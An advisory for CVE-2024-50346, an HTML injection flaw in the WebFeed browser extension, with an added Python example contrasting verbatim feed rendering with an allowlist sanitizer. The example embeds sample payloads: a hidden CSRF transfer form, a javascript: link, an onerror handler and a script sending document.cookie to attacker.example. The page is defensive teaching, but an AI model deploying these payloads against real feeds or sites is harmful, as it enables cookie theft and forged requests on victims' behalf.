PT-2024-34156 · Webfeed

Ouuan · Published 2024-11-04 · Updated 2024-11-05 · CVE-2024-50346

CVSS v4.0: 5.1 (Medium)
Vector: AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N
Name of the Vulnerable Software and Affected Versions: WebFeed (browser extension), versions prior to 0.9.2
Description: WebFeed contains multiple HTML injection vulnerabilities that can lead to CSRF and UI spoofing. A remote attacker publishes a malicious RSS feed and lures the victim into opening it in WebFeed. Because the feed's content is rendered as HTML inside the extension page, the attacker can inject arbitrary markup there and trick the victim into sending HTTP requests to arbitrary sites with the victim's own credentials, so that unwanted actions are performed on the victim's behalf on those sites. The CVSS vector's UI:A reflects that the victim must interact with the injected content; VI:L and SI:L reflect that the resulting requests can alter state both in the extension page and on the third-party sites they are sent to.
Recommendations: Upgrade to WebFeed 0.9.2 or later. Until the upgrade is applied, avoid opening untrusted or potentially malicious RSS feeds in WebFeed, and limit its use to feeds from publishers you trust.
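The injection-to-CSRF chain described above, and the allowlist rendering that removes it, as an added example written for this page (it is not WebFeed's source and does not reproduce its fix). It uses only the Python standard library so it runs offline; the feed, the site names (bank.example, news.example, attacker.example) and every function and constant name are constructed for illustration, and the specific mechanism shown (a form injected into the feed item that posts to an unrelated site) is an assumed instance of the "HTTP requests to arbitrary sites" the advisory describes, not a confirmed exploit path. In the extension itself the equivalent of `render_unsafe` is assigning feed HTML to `innerHTML`, and the equivalent of `render_safe` is parsing with `DOMParser` and applying an allowlist (or a library such as DOMPurify) before anything touches the DOM.

```python
"""Added example, not WebFeed's code: HTML carried in an RSS item becomes a
CSRF primitive when rendered verbatim (the innerHTML pattern); an allowlist
sanitizer removes the primitives while keeping harmless formatting.
All names, URLs and the feed itself are constructed for illustration."""
import xml.etree.ElementTree as ET
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed attacker-controlled feed. The description smuggles a form that
# POSTs to an unrelated site: a victim who clicks "Continue" inside the
# extension page sends that request with their own cookies (the UI:A CSRF the
# advisory describes). Script and event-handler payloads ride along too.
MALICIOUS_FEED = """<rss version="2.0"><channel><title>Free tips</title>
<item><title>Read me</title>
<description><![CDATA[
<p>Click to <b>continue</b> reading.</p>
<form action="https://bank.example/transfer" method="POST">
  <input type="hidden" name="to" value="attacker">
  <input type="hidden" name="amount" value="1000">
  <button type="submit">Continue</button>
</form>
<a href="javascript:alert(document.cookie)" onclick="steal()">also this</a>
<a href="https://news.example/article">legit link</a>
<img src="https://news.example/pic.png" onerror="steal()">
<script>fetch("https://attacker.example/?c=" + document.cookie)</script>
]]></description></item></channel></rss>"""

ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "img", "ul", "ol", "li",
                "br", "blockquote", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https"}  # relative URLs are dropped (fail closed); a
                                  # real reader would resolve them first
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "param", "source", "track", "wbr"}
# Disallowed elements whose text content must go too (script is not prose).
DROP_CONTENT = {"script", "style", "iframe", "noscript", "template",
                "textarea", "title", "object"}


def feed_item_descriptions(xml_text):
    """Raw HTML of each <item><description>. A real reader should parse
    untrusted XML with defusedxml or equivalent; ET keeps this dependency-free."""
    root = ET.fromstring(xml_text)
    return [item.findtext("description", "") for item in root.iter("item")]


def render_unsafe(html_fragment):
    """Vulnerable pattern: the fragment reaches the page unchanged
    (element.innerHTML = description), so every tag above survives."""
    return html_fragment


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the fragment from parse events, keeping only allowlisted tags,
    attributes and http(s) URLs. Unknown tags are removed but their text is
    kept; DROP_CONTENT tags lose their text as well."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropping = 0  # nesting depth inside DROP_CONTENT elements

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.dropping += 1
            return
        if self.dropping or tag not in ALLOWED_TAGS:
            return  # <form>, <input>, <button>: tag gone, text stays
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops every on* handler and style= with one rule
            if name in URL_ATTRS and urlparse(value.strip()).scheme not in SAFE_SCHEMES:
                continue  # drops javascript:, data:, vbscript: and friends
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.dropping = max(0, self.dropping - 1)
        elif not self.dropping and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(escape(data))


def render_safe(html_fragment):
    """Hardened pattern: sanitize before the fragment touches the DOM."""
    p = AllowlistSanitizer()
    p.feed(html_fragment)
    p.close()
    return "".join(p.out)


if __name__ == "__main__":
    desc = feed_item_descriptions(MALICIOUS_FEED)[0]
    print("--- unsafe ---\n" + render_unsafe(desc))
    print("--- safe ---\n" + render_safe(desc))
```

Running the block prints the item twice: the unsafe rendering still contains the form, the hidden inputs, the `javascript:` link, the `onerror` handler and the script, while the sanitized rendering keeps the paragraph, the legitimate link and the image but nothing that can submit or trigger a request on its own. The design point is that the sanitizer is an allowlist: anything not explicitly permitted, including attribute names it has never heard of, is dropped, so new injection vectors do not need a new denylist entry.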

Exploit · Fix · XSS


Related Identifiers

CVE-2024-50346
GHSA-mrc7-2q3w-48j8

Affected Products

Webfeed